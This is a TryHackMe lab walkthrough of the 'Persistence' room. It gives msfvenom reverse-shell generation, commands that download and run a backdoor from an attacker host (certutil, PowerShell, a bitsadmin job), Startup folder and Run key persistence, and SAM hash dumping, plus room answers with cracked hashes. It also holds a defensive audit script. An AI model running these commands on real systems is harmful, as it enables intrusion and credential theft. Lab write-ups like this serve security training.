Persistence TryHackme Writeup

By Shamsher Khan. This is a writeup of the TryHackMe room "Persistence".

Room link: https://tryhackme.com/room/persistence
Note: This room is for Premium Members only (users who have purchased a THM premium membership).

What is persistence?

Persistence is a post-exploitation activity used by penetration testers to keep access to a system throughout the whole assessment, without having to re-exploit the target, even if the system restarts.

Persistence can be split into two types:

  • Low privileged persistence
  • Privileged user persistence

Low privileged user persistence

Low privileged persistence means the penetration tester gained access under a normal user account (for example a domain user with no administrative rights) and uses persistence techniques to keep that access under the same account.

Privileged user persistence

After gaining access to a system, a penetration tester will often (not always) escalate privileges to the highest-privileged account that exists on a Windows machine (NT AUTHORITY\SYSTEM).

After privilege escalation, they will use persistence to keep the access they gained.

Keeping persistence

Ways of keeping persistence:

  • Startup folder persistence
  • Editing registry keys
  • Using scheduled tasks
  • Using BITS
  • Creating a backdoored service
  • Creating another user
  • Backdooring RDP

Task 2. Low privilege user persistence

Start by deploying the machine and connecting to it through RDP using the following credentials:

tryhackme:tryhackme123

I used Remmina to RDP into the machine. If you don't have it installed, you can install it using the following command: sudo apt-get install remmina

Create a Metasploit backdoor using msfvenom. To create the backdoor use the following syntax:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<port> -f exe > backdoor.exe

where LHOST is your IP and LPORT is the port Metasploit will listen on for connections.

Create a Metasploit listener (a multi/handler with the same payload, LHOST and LPORT you used in msfvenom).

Using Python, start a web server in the directory holding the backdoor (python -m SimpleHTTPServer 80 on Python 2, python3 -m http.server 80 on Python 3) and deliver (download) the backdoor to the target system you logged into earlier.

File Transfer method-1

First, open Internet Explorer's settings and choose "Internet Options".

Click on the “Security” tab, select “Trusted Sites” and then click on the “Sites” button. Fill the “Add this website to the zone” field with your IP address and click the “Add” button.


After adding your IP to the trusted sites you can close that dialog and click OK.

Now, you should be able to download your backdoor.


Pressing the "Run" button executes the backdoor on the system and a connection to Metasploit is created.

File Transfer method-2

Another delivery method is PowerShell. Open a PowerShell window and download the backdoor using the following command:

Invoke-WebRequest http://10.x.x.x/backdoor.exe -OutFile backdoor.exe

To execute the backdoor, type .\backdoor.exe

File Transfer method-3

You can also use certutil to download the backdoor, from either the Windows command line or PowerShell. The command to download the file is:

certutil -urlcache -split -f http://10.x.x.x/backdoor.exe

Execution of the backdoor is done in the same way as in method 2, by typing .\backdoor.exe

The session we get is a low privileged user account with no administrative privileges.

Startup folder persistence

Suppose we decide privilege escalation is not necessary and we just want to keep access to the system in case the user restarts the machine. The simplest method is to move the backdoor into the Startup folder.

The path of the Startup folder is: C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (%username% in our case is tryhackme). Browse to that path and upload the binary you generated with msfvenom.

Because the binary is in this user's Startup folder, the backdoor is executed every time that user logs in (including after a restart) and Metasploit receives the connection. Note that it only fires at logon of that user, not at boot.

Editing registry keys

Depending on the key, a low privileged user may be able to edit the registry. With this in mind, an attacker can add registry values to achieve persistence.

An example of a key a normal user can write to is: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. Every value under this key is executed when that user logs in.

First, let's move the backdoor to the AppData\Roaming folder. You can either move it from the Startup folder or upload it again.


Drop into a shell and use reg add to create a value that will run our backdoor, as follows:

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\tryhackme\AppData\Roaming\backdoor.exe"
Notice that the operation completed successfully.

BITS Jobs

BITS (Background Intelligent Transfer Service) is a Windows service used to transfer files between machines (downloading or uploading) using idle network bandwidth.

BITS jobs are containers for the files to be transferred. A newly created job is empty and needs to be populated with one or more files, each with a source and a destination.

Now that we know what BITS is and what jobs are used for let’s try achieving persistence.

You can view the bitsadmin help by running bitsadmin with no arguments in the command line or in the shell you spawned.

Let’s create the job:

bitsadmin /create backdoor

Add the file for the job that will be transferred:

bitsadmin /addfile backdoor "http://10.2.12.26/backdoor.exe" "C:\Users\tryhackme\Documents\backdoor.exe"

Now, let's make BITS execute our backdoor once the transfer finishes. The syntax is bitsadmin /SetNotifyCmdLine <job> <program> <parameters>, so the job name created above has to be given:

bitsadmin /SetNotifyCmdLine backdoor cmd.exe "/c bitsadmin.exe /complete backdoor | start /B C:\Users\tryhackme\Documents\backdoor.exe"

The /complete call is needed because a downloaded file is only written to its final destination once the job is completed. If the program takes no parameters, NULL is passed as the last argument instead (for example bitsadmin /SetNotifyCmdLine backdoor C:\Users\tryhackme\Documents\backdoor.exe NULL); our backdoor itself doesn't need any additional parameters.

Since we want our backdoor to be persistent, we'll also set a minimum retry delay for the job (bitsadmin /SetMinRetryDelay, followed by the job name and the delay in seconds) so BITS keeps retrying the transfer if it fails.

Finally, we'll start/resume the job.

Note: For this to work you need a web server running (I used Apache) so BITS can download the backdoor, and Metasploit listening for connections.

To start the job type: bitsadmin /resume backdoor. As can be seen in the image below, we received a second connection.

Note: BITS persistence is unreliable; it can and might give you only temporary persistence.

Question: What kind of persistence can/might BITS give?

Answer: temporary
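The three techniques above (a binary in the Startup folder, a value under the HKCU Run key, and a BITS job with a notify command line) all leave artefacts that a tester can verify from the same low privileged session and that a defender can hunt for. The following Python script is an added example, not part of the original writeup or the room: on Windows it enumerates those three locations for the current user and flags entries that launch a binary from a user-writable directory or that carry a BITS notify command line; off Windows it runs the same triage over a constructed sample that mirrors what this room plants. The BITS collector assumes (assumption, not verified on the room's machine) that Get-BitsTransfer -AllUsers returns objects exposing DisplayName and NotifyCmdLine properties.

```python
"""Audit the user-level autostart locations this room uses: Startup folder,
HKCU Run key and BITS jobs carrying a notify command line."""
import json
import os
import re
import subprocess
import sys
from dataclasses import dataclass

RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
STARTUP_REL = r"Microsoft\Windows\Start Menu\Programs\Startup"

# Directories a normal user can write to; an autostart launching from one of
# these is exactly what a low privileged foothold looks like.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(AppData|Documents|Downloads|Desktop)\\", re.IGNORECASE)


@dataclass
class Autostart:
    source: str   # "startup", "run" or "bits"
    name: str     # file name, Run value name or BITS job name
    command: str  # what gets executed


def is_suspicious(entry: Autostart) -> bool:
    """True for entries worth a second look."""
    if entry.source == "bits":
        # Legitimate BITS jobs rarely carry a notify command line at all.
        return bool(entry.command.strip())
    return USER_WRITABLE.search(entry.command) is not None


def triage(entries):
    """One readable line per suspicious entry."""
    return [f"{e.source}: {e.name} -> {e.command}"
            for e in entries if is_suspicious(e)]


def collect_startup_folder():
    folder = os.path.join(os.environ["APPDATA"], STARTUP_REL)
    if not os.path.isdir(folder):
        return []
    return [Autostart("startup", f, os.path.join(folder, f))
            for f in os.listdir(folder) if f.lower() != "desktop.ini"]


def collect_run_key():
    import winreg  # Windows only
    out, i = [], 0
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        while True:
            try:
                name, value, _ = winreg.EnumValue(key, i)
            except OSError:  # no more values
                break
            out.append(Autostart("run", name, str(value)))
            i += 1
    return out


def collect_bits_jobs():
    # Assumption: BitsJob objects expose DisplayName and NotifyCmdLine.
    ps = ("Get-BitsTransfer -AllUsers | "
          "Select-Object DisplayName,NotifyCmdLine | ConvertTo-Json")
    raw = subprocess.run(["powershell", "-NoProfile", "-Command", ps],
                         capture_output=True, text=True).stdout.strip()
    if not raw:
        return []
    jobs = json.loads(raw)
    if isinstance(jobs, dict):  # ConvertTo-Json unwraps a single object
        jobs = [jobs]
    return [Autostart("bits", j.get("DisplayName") or "",
                      j.get("NotifyCmdLine") or "") for j in jobs]


# Constructed sample mirroring what the room plants, used off Windows.
SAMPLE = [
    Autostart("startup", "backdoor.exe",
              r"C:\Users\tryhackme\AppData\Roaming\Microsoft\Windows"
              r"\Start Menu\Programs\Startup\backdoor.exe"),
    Autostart("run", "Backdoor", r"C:\Users\tryhackme\AppData\Roaming\backdoor.exe"),
    Autostart("run", "OneDrive",
              r"C:\Program Files\Microsoft OneDrive\OneDrive.exe /background"),
    Autostart("bits", "backdoor",
              r"cmd.exe /c bitsadmin.exe /complete backdoor | start /B "
              r"C:\Users\tryhackme\Documents\backdoor.exe"),
    Autostart("bits", "Windows Update", ""),
]


def main():
    if sys.platform == "win32":
        entries = collect_startup_folder() + collect_run_key() + collect_bits_jobs()
    else:
        entries = SAMPLE
    for line in triage(entries):
        print(line)


if __name__ == "__main__":
    main()
```

The user-writable heuristic is deliberately loose: legitimate software such as OneDrive or Teams also installs under AppData\Local, so treat a hit as a lead rather than a verdict. Running it after a logoff/logon of the tryhackme user is a quick way to confirm the Run value and the BITS job survived, which is the point of the exercise.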

What is hash dumping?

Hash dumping is the technique used by penetration testers to extract the password hashes from the target system, either to crack them or to use them for lateral movement (for example pass-the-hash).

The simplest way to dump hashes is Meterpreter's hashdump command or the kiwi extension. Both need a privileged session (SYSTEM or a local administrator), because a normal user cannot read the SAM:


The same result can be achieved by saving the SAM and SYSTEM registry hives, downloading the files and using samdump2 (the SYSTEM hive is needed because it holds the boot key that encrypts the SAM).

Let's first save the hives on the target machine:


With the hives saved, download the files to the attacker machine and use samdump2 to recover the hashes.


Some entries appear without a user name, only their hashes. To map them, query the users that exist on the system.

You can also dump credentials using kiwi, the Meterpreter equivalent of mimikatz. To do that you'll need to load the extension: load kiwi.

The command used to dump the SAM database hashes is: lsa_dump_sam


There are more ways of dumping hashes and multiple tools and scripts that can be used for this purpose.

Note: If you plan to crack the hashes offline, the passwords are contained in the following wordlist from SecLists: 100k-most-used-passwords-NCSC.txt (/usr/share/seclists/Passwords/Common-Credentials). If you do not have SecLists installed you can install it with: sudo apt-get install seclists

Question: What's Chris' decrypted NTLM?

878d8014606cda29677a44efa1353fc7 (cracked with https://crackstation.net/)

Answer: secret

Question: What's Joe's decrypted NTLM?

e0b6050c7280bf4a7bee599cf374fd80

Answer: mypass123

You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher


For more walkthroughs stay tuned…

Before you go, thank you for taking the time to read my walkthrough. If you found it helpful, please hit the 👏 button (up to 40x) and share it to help others with similar interests! Feedback is always welcome!

Web Application Pen-tester || CTF Player || Security Analyst